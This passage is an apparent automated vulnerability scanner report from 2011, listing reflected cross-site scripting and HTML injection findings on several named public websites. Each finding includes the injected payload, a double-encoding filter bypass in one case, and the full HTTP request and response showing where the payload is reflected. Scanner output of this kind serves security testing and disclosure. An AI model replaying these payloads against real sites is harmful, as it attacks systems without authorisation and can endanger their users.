Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=sbdibi45oqlx1b45piq0vq45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2627156
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/ourpeople/List.aspx?ec2f0"><script>alert(1)</script>2daf70c6706=1&print=true'); ">
...[SNIP]...

4.146. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79e4"><script>alert(1)</script>00e92029aec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:00 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowsec79e4"><script>alert(1)</script>00e92029aec/ajax/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...

4.147. http://www.hollerclassic.com/smartbrowse/ajax/used.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hollerclassic.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ab29"><script>alert(1)</script>cc275c6ab53 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=false&showBodyStyle=false&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.hollerclassic.com
Proxy-Connection: keep-alive
Referer: http://www.hollerclassic.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63dda7ab0a0a002f017f2dac183a097c; JSESSIONID=8klanm5n1qr6h; ddcpoolid=CmsPoolP; __utmz=193517236.1303050588.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/36; __utma=193517236.1979268532.1303050588.1303050588.1303050588.1; __utmc=193517236; __utmb=193517236.1.10.1303050588

Response

HTTP/1.1 404 Not Found
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13798
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:30:01 GMT
Connection: close

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms14.dealer.ddc p7072 -->

   <title> | New Audi, Chevrolet, Honda, Hummer, Hyundai, Mazda dealership in Winter Park, FL 32789
...[SNIP]...
<img src="http://hits.dealer.com/clear.gif?&amp;4=0&amp;5=0&amp;10=http://www.google.com/search?hl=en&q=18a7b'-alert(document.cookie)-'9a5e8f0fc61&amp;20=www.hollerclassic.com&amp;21=/smartbrowse/ajax5ab29"><script>alert(1)</script>cc275c6ab53/used.htm&amp;50=63dda7ab0a0a002f017f2dac183a097c&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...

4.148. http://www.info.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4beb'><a>13945db1d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?c4beb'><a>13945db1d18=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:19:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17819

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<img src='http://info.intelli-direct.com/e/t3.dll?280&0&%20&qcat%3DWeb%26itpage%3D?c4beb'><a>13945db1d18=1&iREGQry&iSale&0&0&0&0&0&0&%20&1500&%20&0' height=1 width=1 border=0>
...[SNIP]...

4.149. http://www.info.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9857d"-alert(1)-"1634c822576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9857d"-alert(1)-"1634c822576=1 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.219CKMLO; path=/
Date: Sun, 17 Apr 2011 14:19:47 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17824

<html><head>
       <title>Info.com - Search the Web</title>
   <meta name=keywords content="Info,information,Search,Searches,Searching,Searchers,Advanced search,Search Help,Search guide,Search tips,Search t
...[SNIP]...
<!--
var pqry="qcat%3DWeb%26itpage%3D?9857d"-alert(1)-"1634c822576=1";var rqry="iREGQry";var sqry="iSale";var dt=window.document,nr=navigator,ina=nr.appName,sr="0&0",px=0,sv=10,je=0; var inav=nr.appVersion,iie=inav.indexOf('MSIE '),intp=(ina.indexOf('Netscape')>
...[SNIP]...

4.150. http://www.info.com/washington%20dc%20law%20firms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.info.com
Path:   /washington%20dc%20law%20firms

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 was submitted in the REST URL parameter 1. This input was echoed as 436a5<script>alert(1)</script>d23057a9ce0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /washington%20dc%20law%20firms436a5%253cscript%253ealert%25281%2529%253c%252fscript%253ed23057a9ce0 HTTP/1.1
Host: www.info.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: Z=YOYLQIS74.205.26.218CKMLM; path=/
Date: Sun, 17 Apr 2011 14:20:35 GMT
Server: Apache
Set-Cookie: a=newwindow+1+dpcollation_web+1+lang+0+familyfilter+1+bold+1+msRecentSearches+off+autocorrect+0+domain+infocom+ts+1303050035+last_cmp++engineset+int-only; expires=Thu, 16-Apr-2037 21:28:31 GMT; path=/; domain=.info.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40031

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms436a5%3cscript%3ealert%281%29%3c%2fscript%3ed23057a9ce0 - www.Info.com</title><l
...[SNIP]...
<a href="http://Info.com/searchw?qkw=washington+dc+law+firms+436a5%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed23057a9ce0&r_cop=spell" style="text-decoration:underline">washington dc law firms 436a5<script>alert(1)</script>d23057a9ce0</a>
...[SNIP]...

4.151. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jonesdaydiversity.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d198'-alert(1)-'69c20afbe3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5d198'-alert(1)-'69c20afbe3b=1 HTTP/1.1
Host: www.jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:14:45 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A38
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=fcj5d3imp2gaac3js0iubt32; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9869
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63e45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...
<![CDATA[
var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?5d198'-alert(1)-'69c20afbe3b=1';//]]>
...[SNIP]...

4.152. http://www.jumptags.com/add/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jumptags.com
Path:   /add/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bfaa"><script>alert(1)</script>8d9f2554263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /add/?6bfaa"><script>alert(1)</script>8d9f2554263=1 HTTP/1.1
Host: www.jumptags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sunday 15-May-1994 12:00:00 GMT
Date: Sun, 17 Apr 2011 13:55:01 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=172837142;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: CFTOKEN=71173826;expires=Tue, 09-Apr-2041 13:55:02 GMT;path=/
Set-Cookie: JSESSIONID=843026b25bd8e385f77c781a33293677206c;path=/
Content-Length: 2684


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- *** P
...[SNIP]...
<form action="/add/index.cfm?6bfaa"><script>alert(1)</script>8d9f2554263=1" method="post" name="l" id="l">
...[SNIP]...

4.153. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2413"><a>4930429a96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grabf2413"><a>4930429a96f/addItemWithUrl HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22268%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grabf2413"><a>4930429a96f/addItemWithUrl.html" />
...[SNIP]...

4.154. http://www.kaboodle.com/grab/addItemWithUrl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f220"><a>389513feb5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /grab/addItemWithUrl3f220"><a>389513feb5b HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:23 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22526%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Date: Sun, 17 Apr 2011 14:14:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/grab/addItemWithUrl3f220"><a>389513feb5b.html" />
...[SNIP]...

4.155. http://www.kaboodle.com/grab/addItemWithUrl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /grab/addItemWithUrl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f9f"><script>alert(1)</script>e350adcdd3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /grab/addItemWithUrl?a5f9f"><script>alert(1)</script>e350adcdd3f=1 HTTP/1.1
Host: www.kaboodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Tue, 16-Apr-2013 14:14:11 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22267%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 3118
Date: Sun, 17 Apr 2011 14:14:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>
<head>


            <link r
...[SNIP]...
<input type="hidden" name="a5f9f"><script>alert(1)</script>e350adcdd3f" value="1"/>
...[SNIP]...

4.156. http://www.kaboodle.com/za/additem [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kaboodle.com
Path:   /za/additem

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea03"><a>2463a037575 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /zaaea03"><a>2463a037575/additem?a5f9f= HTTP/1.1
Host: www.kaboodle.com
Proxy-Connection: keep-alive
Referer: http://www.kaboodle.com/grab/addItemWithUrl?a5f9f%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee350adcdd3f=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ss=""; pp=%00tA%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; sd=%7B%22mv%22%3A%22654%22%2C%22mv_s%22%3A%221%22%7D; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26D57BF7851D2609-60000130002CA7D2[CE]

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 14:24:24 GMT
Content-Length: 70270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<link rel="canonical" href="http://www.kaboodle.com/zaaea03"><a>2463a037575/additem.html" />
...[SNIP]...

4.157. http://www.kirtsy.com/submit.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kirtsy.com
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc309\"><img src=a onerror=alert(1)>f2948ed7988 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?fc309"><img%20src%3da%20onerror%3dalert(1)>f2948ed7988=1 HTTP/1.1
Host: www.kirtsy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:12 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 20799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" name="return" value="/submit.php?fc309\"><img src=a onerror=alert(1)>f2948ed7988=1"/>
...[SNIP]...

4.158. http://www.mister-wong.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mister-wong.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 was submitted in the REST URL parameter 1. This input was echoed as 4f462"><img src=a onerror=alert(1)>7a35b20e713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index.php4f462"><img%20src%3da%20onerror%3dalert(1)>7a35b20e713 HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:14:46 GMT
Server: Apache
Set-Cookie: wongsess=178585a74b2117df7bb2ef56a6ca693c; expires=Wed, 16 Apr 2036 20:14:46 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Length: 5168
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<div id="main" class="c_index.php4f462"><img src=a onerror=alert(1)>7a35b20e713">
...[SNIP]...

4.159. http://www.morrisonmahoney.com/location.asp [loid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.morrisonmahoney.com
Path:   /location.asp

Issue detail

